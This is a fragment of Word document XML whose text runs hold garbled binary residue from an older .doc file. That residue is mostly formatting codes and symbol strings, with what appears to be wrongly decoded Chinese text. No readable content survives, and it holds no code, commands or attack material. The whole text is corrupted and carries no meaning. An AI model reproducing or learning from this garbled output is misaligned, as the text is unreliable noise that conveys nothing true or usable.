        <w:t>#_#_#_#_#_#_#?N</w:t>
        <w:br/>
        <w:t>N?S?[??/fUS#N?N?T?v?z?N?S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N?v?N?T?~US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  <w:tab/>
        <w:t>g#b?Ny??v?N?T?m?S?v?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?N(W?b/gB\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</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>N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(??z?N#?#0#b?N/f?NR??^#?&amp;^?Ry??v#?.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\R??^@be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b?N?v?b/g?P#Y?T#^:W0W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/f(W?N?T#b,g</w:t>
        <w:br/>
        <w:t>N#N?p?R+Y1\?S?N#S??z?N?R?R#0ZPR??^@b?v#O#N??/f(Wv`'`?z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  <w:tab/>
        <w:t>g#N*N#O#N?S?N~g?S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?N?[#b,g?v?S?i/f?vS_%N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N?T?_??</w:t>
        <w:tab/>
        <w:t>g?^#h#0@b?N(W?*N#^:W</w:t>
        <w:br/>
        <w:t>N?l</w:t>
        <w:tab/>
        <w:t>g?~?[?v?T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</w:t>
        <w:tab/>
        <w:t>g?N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$###&amp;###.###2###6###&gt;###B###J###L###X###Z###\###d###f###h###~###?###?###?###?###?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2</w:t>
        <w:tab/>
        <w:t>##4</w:t>
        <w:tab/>
        <w:t>##6</w:t>
        <w:tab/>
        <w:t>##@</w:t>
        <w:tab/>
        <w:t>##B</w:t>
        <w:tab/>
        <w:t>##F</w:t>
        <w:tab/>
        <w:t>##H</w:t>
        <w:tab/>
        <w:t>##J</w:t>
        <w:tab/>
        <w:t>##L</w:t>
        <w:tab/>
        <w:t>##N</w:t>
        <w:tab/>
        <w:t>##P</w:t>
        <w:tab/>
        <w:t>##V</w:t>
        <w:tab/>
        <w:t>##\</w:t>
        <w:tab/>
        <w:t>##??????????????????????????????????????????????????##h?###CJ #PJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?###PJ##o(#</w:t>
        <w:br/>
        <w:t>#h?###PJ###</w:t>
        <w:br/>
        <w:t>#h?###@?###</w:t>
        <w:tab/>
        <w:t>#h?###o(#</w:t>
        <w:tab/>
        <w:t>#h?###o(#</w:t>
        <w:br/>
        <w:t>#h?###@?###</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?###@?##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?###@?##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?###CJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h##?#CJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?###CJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?###CJ##o(###h?###@?##CJT#PJ#####h?###@?##CJT#PJ##o(###h?###@?##PJ##o(###h?###@?##PJ##4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###6###8###:###&lt;###&gt;###@###B###L###Z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####$##d,###a$######$#a$#######?;##?&lt;##.=##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###\###f###?###?############?############u###################################################################################################################################################################################################$##$#G$#H$#If####a$#gd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n##kd#####$##$#If#####?l##?##########################?X##?0##?#?#?#?#?#????####????####?####################?0###?#######?#######?#######?#######?#######?#####?####?#????###?#?####?###?#?#????###?#?####?###?4?###</w:t>
        <w:br/>
        <w:t>#l#a?#&gt;###?###?###?###?###?############?############?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n##kd?####$##$#If#####?l##?##########################?X##?0##?#?#?#?#?#????####????####?####################?0###?#######?#######?#######?#######?#######?#####?####?#????###?#?####?###?#?#????###?#?####?###?4?###</w:t>
        <w:br/>
        <w:t>#l#a?#&gt;###?###?###?###?###?############?############?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n##kd^####$##$#If#####?l##?##########################?X##?0##?#?#?#?#?#????####????####?####################?0###?#######?#######?#######?#######?#######?#####?####?#????###?#?####?###?#?#????###?#?####?###?4?###</w:t>
        <w:br/>
        <w:t>#l#a?#&gt;###?###?###?####</w:t>
        <w:tab/>
        <w:t>##?############?############?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n##kd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>####$##$#If#####?l##?##########################?X##?0##?#?#?#?#?#????####????####?####################?0###?#######?#######?#######?#######?#######?#####?####?#????###?#?####?###?#?#????###?#?####?###?4?###</w:t>
        <w:br/>
        <w:t>#l#a?#&gt;####</w:t>
        <w:tab/>
        <w:t>###</w:t>
        <w:tab/>
        <w:t>###</w:t>
        <w:tab/>
        <w:t>##4</w:t>
        <w:tab/>
        <w:t>##?############?############?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n##kd?####$##$#If#####?l##?##########################?X##?0##?#?#?#?#?#????####????####?####################?0###?#######?#######?#######?#######?#######?#####?####?#????###?#?####?###?#?#????###?#?####?###?4?###</w:t>
        <w:br/>
        <w:t>#l#a?#&gt;###4</w:t>
        <w:tab/>
        <w:t>##6</w:t>
        <w:tab/>
        <w:t>##B</w:t>
        <w:tab/>
        <w:t>##H</w:t>
        <w:tab/>
        <w:t>##?############?############?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n##kdk####$##$#If#####?l##?##########################?X##?0##?#?#?#?#?#????####????####?###########????#####?0###?#######?#######?#######?#######?#######?#####?####?#????###?#?####?###?#?#????????#?####?###?4?###</w:t>
        <w:br/>
        <w:t>#l#a?#&gt;###H</w:t>
        <w:tab/>
        <w:t>##J</w:t>
        <w:tab/>
        <w:t>##L</w:t>
        <w:tab/>
        <w:t>##N</w:t>
        <w:tab/>
        <w:t>##P</w:t>
        <w:tab/>
        <w:t>##R</w:t>
        <w:tab/>
        <w:t>##T</w:t>
        <w:tab/>
        <w:t>##V</w:t>
        <w:tab/>
        <w:t>##n</w:t>
        <w:tab/>
        <w:t>##?</w:t>
        <w:tab/>
        <w:t>##?</w:t>
        <w:tab/>
        <w:t>##?</w:t>
        <w:tab/>
        <w:t>##?############?############?############?############?############?############?############|############t############j############j##################################</w:t>
        <w:tab/>
        <w:t>###d,####?x#G$#H$######$##d,###a$######$##dh###a$######dh############$#a$##n##kd(####$##$#If#####?l##?##########################?X##?0##?#?#?#?#?#????####????####?####################?0###?#######?#######?#######?#######?#######?#####?####?#????###?#?####?###?#?#????###?#?####?###?4?###</w:t>
        <w:br/>
        <w:t>#l#a?#&gt;###\</w:t>
        <w:tab/>
        <w:t>##d</w:t>
        <w:tab/>
        <w:t>##l</w:t>
        <w:tab/>
        <w:t>##n</w:t>
        <w:tab/>
        <w:t>##~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(</w:t>
        <w:br/>
        <w:t>##4</w:t>
        <w:br/>
        <w:t>##&lt;</w:t>
        <w:br/>
        <w:t>##B</w:t>
        <w:br/>
        <w:t>##J</w:t>
        <w:br/>
        <w:t>##N</w:t>
        <w:br/>
        <w:t>##X</w:t>
        <w:br/>
        <w:t>##z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?????????????|????|???????????????????r#####################h?####h?###CJ##o(###hq6y#CJ##PJ##o(###h?###CJ##PJ##o(###h?###CJ##PJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?###CJ##o(###h?###CJ##PJ##o(###h?/d##h4B?#5#?CJ,#aJ,#o(####h?/d##h?###5#?CJ,#aJ,#o(####h?###@?##CJ##PJ##o(###h?###@?##CJ##PJ###</w:t>
        <w:br/>
        <w:t>#h?###CJ###</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h#@##CJ##o(###h?###CJ #PJ#####h?###CJ #PJ##o(###hNHK#CJ #PJ##o(##)?</w:t>
        <w:tab/>
        <w:t>##?</w:t>
        <w:tab/>
        <w:t>##?</w:t>
        <w:br/>
        <w:t>##?</w:t>
        <w:br/>
        <w:t>##d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?############?############?############?############?############?############?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?##d,####?x#^??#gd##?######?###?X##d,####?x#VDv#WD?#^?##`?X#gd##?#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>##</w:t>
        <w:br/>
        <w:t>&amp;##F</w:t>
        <w:br/>
        <w:t>##d,####?x#gd##?##</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###??##d,####?x#`??#gd4B?#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>##</w:t>
        <w:br/>
        <w:t>&amp;##F###dh###WD##gd?###</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>##</w:t>
        <w:br/>
        <w:t>&amp;##F###d,####?x#G$#H$######$##d,####?x#G$#H$#a$#gd?~)###?</w:t>
        <w:br/>
        <w:t>##?</w:t>
        <w:br/>
        <w:t>##?</w:t>
        <w:br/>
        <w:t>##b###d###v###z###~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########</w:t>
        <w:br/>
        <w:t>###&amp;###(###.###???????????????????????????|??|?m######h##?#CJ##KH##OJ##QJ##^J##o(###hr5:#CJ##OJ##PJ##o(###h##?##h##?#CJ##OJ##PJ##o(###h4B?##h##?#CJ##OJ##PJ##o(###j#####h##?#U##mH##nH##u#####h##?#CJ##OJ##PJ##o(###h?####h?###CJ##o(###h?###CJ##OJ##PJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?###CJ##o(###h4B?##h#@##CJ##OJ##PJ##o(###h?~)#CJ##OJ##PJ##o(###h4B?##h?###CJ##OJ##PJ##o(##*8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####(###^###?###2###x###?#######D###P###?###?###?############?############?############?############?############?############?############?############?############?############?############?############x################################?x##??##d,####?x#G$#H$#VD9#WD?#^?x#`??#gd4B?######?x##??##d,####?x#G$#H$#VD9#WDd#^?x#`??#gd?~)#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>##</w:t>
        <w:br/>
        <w:t>&amp;##F###d,####?x#G$#H$##</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###??##d,####?x#`??#gd4B?##</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###??##d,####?x#`??#gd##?######??##?x##d,####?x#VD?#WD2#^??#`?x#gd##?######??##?i##d,####?x#VD?#WD2#^??#`?i#gd##?##</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>.###P###X###\###^###?###?###?###################v###x###?###?###?###?###?###?###################4###@###D###N###?????????????u?u?u?u?eueYP#######################h?###CJ##PJ##o(###h4B?##h?###CJ##PJ##o(###h4B?##h?#?#CJ##OJ##PJ##QJ##o(###h?~)#CJ##OJ##PJ##QJ##o(###h4B?##h?###CJ##OJ##PJ##QJ##o(###h##?#CJ##OJ##PJ##QJ##o(###h4B?##h?###CJ##OJ##PJ##QJ##o(###h##?##h##?#CJ##OJ##PJ##o(###h##?#CJ##OJ##PJ##o(###h##?##h##?#CJ##PJ##o(###h##?##h##?#CJ##PJ##^J##o(###h##?#CJ##PJ##QJ##^J##o(###h##?##h##?#CJ##PJ##QJ##^J##o(###N###P###?###?###?###?###?###?###?###?###?###?###T###d###f###h###|###?###?###?###?###?###?###?###j###l###z###?###?###?###?###?###?###?###?###?###????????????????xkxk^k^x^x^x###########h#Y?#CJ##OJ##PJ##QJ##o(###h#E##CJ##OJ##PJ##QJ##o(###h#E###h#E##CJ##OJ##PJ##QJ##o(###h4B?##h4B?#CJ##o(###h?###CJ##PJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?###CJ##o(###h?/d#CJ##PJ##o(###h#_(#CJ##PJ##o(###h?l7#CJ##PJ##o(###h?###CJ##PJ##o(###h4B?#CJ##PJ##o(###h#@##CJ##PJ##o(###hz!(#CJ##OJ##PJ##QJ##o(###h#M?##h#M?#CJ##OJ##PJ##QJ##o(###h?#?##h?#?#CJ##o(###?###?#######</w:t>
        <w:br/>
        <w:t>###?###?###?###?###?###J###T###?###?###?############?############?############?############?############?############?############?############?############?########################s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\###</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###??##d,####?x#`??#gd?\##</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>##</w:t>
        <w:br/>
        <w:t>&amp;##F###d,####?x#G$#H$######?x##d,####?x#VD9#^?x#gd?yS######?x##d,####?x#G$#H$#^?x#gd?eV######?x##d,####?x#WD2#`?x#gd?yS######?x##??##d,####?x#G$#H$#VD9#WD?#^?x#`??#gd?Ca##</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###??##d,####?x#`??#gd#E##</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>##</w:t>
        <w:br/>
        <w:t>&amp;##F###d,####?x#G$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###</w:t>
        <w:br/>
        <w:t>###T###?###?###?###?###?###?#######?###?###?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##?###?###?###?###???????????????rh_?_?O##########################h?B?##h?B?#CJ##OJ##PJ##QJ##o(###h?B?#CJ##PJ##o(###h?eV##h?eV#CJ##o(###h?eV##h?eV#CJ##OJ##PJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?B?#CJ##o(###h?eV#CJ##PJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?###CJ##o(###h?p#CJ##PJ##o(###h?#?#B*#CJ##aJ##o(#ph#######h?#?#B*#CJ##aJ##ph######h?#?#CJ##PJ##o(###hn#n#CJ##PJ##o(###h-h?#CJ##PJ##o(###h?Ca#CJ##PJ##o(###hq6y##hq6y#CJ##o(###h?###CJ##PJ##o(###h#E###h#E##CJ##OJ##PJ##QJ###?###?###?###?###?###?###?###H###J###R###T###?###?###?###?###?###?###?###?###?###?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 ###"###&amp;###(###????????????u?u?lu?lu?lu?lu?lu?eu?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]F##h?\#####h?\##5#?aJ##o(####h#]F##h?\##5#?aJ##o(####h#]F##h?\##5#?aJ####h?\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CJ##OJ##PJ##o(###h?\##CJ##OJ##PJ##QJ##o(###h?\###h?\##CJ##OJ##PJ##QJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?###CJ##o(###h?yS#CJ##OJ##QJ#####h??F#CJ##OJ##PJ##QJ##o(###h?yS##h?yS#CJ##OJ##PJ##QJ##o(###h?###CJ##PJ##o(###h?yS#CJ##PJ##o(###h?B?#CJ##OJ##QJ##%?###?################### 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h####$#If####a$#gd?\##</w:t>
        <w:tab/>
        <w:t>###$#If####gd?\#### ###"###(###*#############################################$##dh####$#If####a$#gd?\##?##kd?####$##$#If#####?l##?##########################??##?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 ##R#################?#?#################?#?#################?#?#################?#?#################?#?#################</w:t>
        <w:br/>
        <w:t>t##?##?0###?#######?#######?#######?#######?#######?#####?####6##?####?####?###?###?###?###?###?#?####?###?###?###?###?###?#?####?###?###?###?###?###?#?####?###?###?###?###?###?4?#######4?###</w:t>
        <w:br/>
        <w:t>#l# ?########/?#######?####a?###yt?\####(###4###6###@###B###L###N###X###Z###f###h###j###n###p###|###~###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?#######</w:t>
        <w:br/>
        <w:t>###########"###$###2###4###&gt;###@###B###H###J###V###X###d###f###r###t###?###?###?###?###?###?###?###?###?###??????????????????????????????????????????????????????????????????###################h?###CJ##PJ##o(###h?\##CJ##PJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>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CJ##o(###h#]F##h?\##5#?aJ##o(####h#]F##h?\##5#?aJ####h?\##5#?aJ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]F##h?\#####h#]F##h?\##aJ###</w:t>
        <w:br/>
        <w:t>#h?\##aJ##C(###6###B###N###Z###h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h####$#If####a$#gd?\####h###j###p###~###?###8############)############)############)##########################$##dh####$#If####a$#gd?\##?##kd?####$##$#If#####?l##?##########################?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 ##R###################?###################?###################?###################?###################?#################</w:t>
        <w:br/>
        <w:t>t##?##?0###?#######?#######?#######?#######?#######?#####?####6##?####?####?###?###?###?###?###?#?####?###?###?###?###?###?#?####?###?###?###?###?###?#?####?###?###?###?###?###?4?#######4?###</w:t>
        <w:br/>
        <w:t>#l#a?###yt?\####?###?###?###?###?###?############?############?############)######################?##kd?####$##$#If#####?l##?##########################?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 ##R###################?###################?###################?###################?###################?#################</w:t>
        <w:br/>
        <w:t>t##?##?0###?#######?#######?#######?#######?#######?#####?####6##?####?####?###?###?###?###?###?#?####?###?###?###?###?###?#?####?###?###?###?###?###?#?####?###?###?###?###?###?4?#######4?###</w:t>
        <w:br/>
        <w:t>#l#a?###yt?\######$##dh####$#If####a$#gd?\####?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h####$#If####a$#gd?\####?###?###?###</w:t>
        <w:br/>
        <w:t>#######8############)############)############)##########################$##dh####$#If####a$#gd?\##?##kd?####$##$#If#####?l##?##########################?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 ##R###################?###################?###################?###################?###################?#################</w:t>
        <w:br/>
        <w:t>t##?##?0###?#######?#######?#######?#######?#######?#####?####6##?####?####?###?###?###?###?###?#?####?###?###?###?###?###?#?####?###?###?###?###?###?#?####?###?###?###?###?###?4?#######4?###</w:t>
        <w:br/>
        <w:t>#l#a?###yt?\########$###4###@###B###?############?############?############)######################?##kd?####$##$#If#####?l##?##########################?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 ##R###################?###################?###################?###################?###################?#################</w:t>
        <w:br/>
        <w:t>t##?##?0###?#######?#######?#######?#######?#######?#####?####6##?####?####?###?###?###?###?###?#?####?###?###?###?###?###?#?####?###?###?###?###?###?#?####?###?###?###?###?###?4?#######4?###</w:t>
        <w:br/>
        <w:t>#l#a?###yt?\######$##dh####$#If####a$#gd?\####B###J###X###f###t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h####$#If####a$#gd?\####?###?###?###8######################################################?x##??##d,####?x#G$#H$#VD9#WD?#^?x#`??#g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?##kdf</w:t>
        <w:tab/>
        <w:t>###$##$#If#####?l##?##########################?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 ##R###################?###################?###################?###################?###################?#################</w:t>
        <w:br/>
        <w:t>t##?##?0###?#######?#######?#######?#######?#######?#####?####6##?####?####?###?###?###?###?###?#?####?###?###?###?###?###?#?####?###?###?###?###?###?#?####?###?###?###?###?###?4?#######4?###</w:t>
        <w:br/>
        <w:t>#l#a?###yt?\####?###?###0###&gt;###?###?###L###?###?###V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d ##? ###!##h!##?!## "##v"##z"##?"##?"##f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</w:t>
        <w:tab/>
        <w:t>###d,####?x#G$#H$##</w:t>
        <w:tab/>
        <w:t>###dh####?x#G$#H$#####</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">?###n </w:t>
        <w:br/>
        <w:t>#####$#a$######?X##d,####?x#WD?#`?X#gd#Q?######?x##d,####?x#G$#H$#^?x#g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?###,###.###0###&gt;###@###\###^###b###d###f###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?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B###D###F###???????????????}????l?????}????[?### ##?#j=#######h?###U##mH##nH##u### ##?#j?</w:t>
        <w:br/>
        <w:t>######h?###U##mH##nH##u#####h?###PJ##mH##nH##u## ##?#jC</w:t>
        <w:br/>
        <w:t>######h?###U##mH##nH##u#####j#####h?###U##mH##nH##u#####h?###mH##nH##u####h?###PJ##mH##nH##o(#u#####h?###CJ##PJ#####j#####h?###CJ##PJ##U####h?###CJH#PJ##o(###h?###@?##CJ##PJ##o(###h?###@?##CJ##PJ#####h?\###h?\##CJ##OJ##PJ##QJ##o(###F###H###J###L###T###X###b###d###f###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?#######################J###L###N###R###T###V###^###b###p###r###t###?###????????????????????????????????????????????################################## ##?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?###U##mH##nH##u### ##?#j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?###U##mH##nH##u#####h?###OJ##PJ##mH##nH##u####h?###OJ##PJ##mH##nH##o(#u### ##?#j?#######h?###U##mH##nH##u#####h?###PJ##mH##nH##u####h?###PJ##mH##nH##o(#u#####j#####h?###U##mH##nH##u#####h?###mH##nH##u###,?###?###?###?###?###?###?###?###?###?###?#### ### ### ### ##</w:t>
        <w:br/>
        <w:t xml:space="preserve">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  ##" ##$ ##X ##Z ##\ ##` ##b ##d ##l ##p ##t ##v ##x ##? ##? ##? ##? ##? ##? ##? ##? ##? ##? ##? ###!###!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?????????????????????????????????????????|???#### ##?#j%#######h?###U##mH##nH##u### ##?#j?#######h?###U##mH##nH##u### ##?#j+#######h?###U##mH##nH##u### ##?#j?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>######h?###U##mH##nH##u#####h?###PJ##mH##nH##u####h?###PJ##mH##nH##o(#u#####h?###mH##nH##u####j#####h?###U##mH##nH##u### ##?#j1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>######h?###U##mH##nH##u##0#!###!###!###!##$!##&amp;!##(!##\!##^!##`!##d!##f!##h!##r!##v!##~!##?!##?!##?!##?!##?!##?!##?!##?!##?!##?!##?!##?!##?!###"###"###"###"###"## "##*"##."##2"##4"##6"##j"##l"##n"##r"##t"##v"##x"##??????????????????????????????????????????????########################j#####h?###CJ##PJ##U## ##?#j########h?###U##mH##nH##u### ##?#j?#######h?###U##mH##nH##u### ##?#j########h?###U##mH##nH##u### ##?#j?#######h?###U##mH##nH##u#####j#####h?###U##mH##nH##u#####h?###PJ##mH##nH##u####h?###PJ##mH##nH##o(#u#####h?###mH##nH##u###.x"##z"##?"##?"##?"##?"##?"##?"##?"##?"##?"##?"##?"##############2###@###B###D###H###J###L###d###r###|###?###?###?###?###?###?###?###?###?###?###?####$###$##.$##8$##D$##F$##X$##`%##?%##?%##?%##?%##?%##"&amp;##????????????????????????????????????????################j#####h?###CJ##U####h?###6#?CJ##o(####h?\###h?\##&gt;*#CJ##o(####h?\###h?###&gt;*#CJ####h?\###h?###&gt;*#CJ##o(####h?\##&gt;*#CJ##o(##</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?\##CJ##o(#$#h?\###h?\##CJ##eh####o(#r?####?#####</w:t>
        <w:br/>
        <w:t>#h?###CJ###</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?###CJ##o(###h?###CJH#PJ##o(###h?###@?##CJ##PJ##o(##2f###?### $##"$##:$##F$##?%##?%##*&amp;##,&amp;##.&amp;##0&amp;##2&amp;##4&amp;##6&amp;##8&amp;##:&amp;##V&amp;##X&amp;##\&amp;##`&amp;##d&amp;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?##dh###WD?#`??#gd?\###</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###??##dh###WD?#`??#gd?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,####?x#G$#H$#a$##</w:t>
        <w:tab/>
        <w:t>###d,####?x#G$#H$###"&amp;##$&amp;##&amp;&amp;##(&amp;##*&amp;##,&amp;##:&amp;##P&amp;##X&amp;##Z&amp;##\&amp;##^&amp;##`&amp;##b&amp;##d&amp;##f&amp;##h&amp;##~&amp;##?&amp;##?&amp;##?&amp;##?&amp;##?&amp;##?&amp;##?&amp;##?&amp;##?&amp;##?&amp;##?&amp;##?&amp;##?&amp;##?&amp;##?&amp;##?&amp;##?&amp;##?&amp;##?&amp;##?&amp;##?&amp;##?&amp;##?&amp;##????????????????????????????????ymgy?y##</w:t>
        <w:br/>
        <w:t>#h?k?#CJ#####h?k?##h?k?#&gt;*#CJ##o(##</w:t>
        <w:br/>
        <w:t>#h?###CJ#####h?###6#?CJ##o(####h? ]##h?\##KH##OJ##PJ##aJ##o(###h?\##KH##OJ##PJ##aJ#####h#0?##h?\##CJ##KH###</w:t>
        <w:br/>
        <w:t>#h?\##CJ#####j#####h?\##U##mH##nH##u###</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#hNHK#CJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
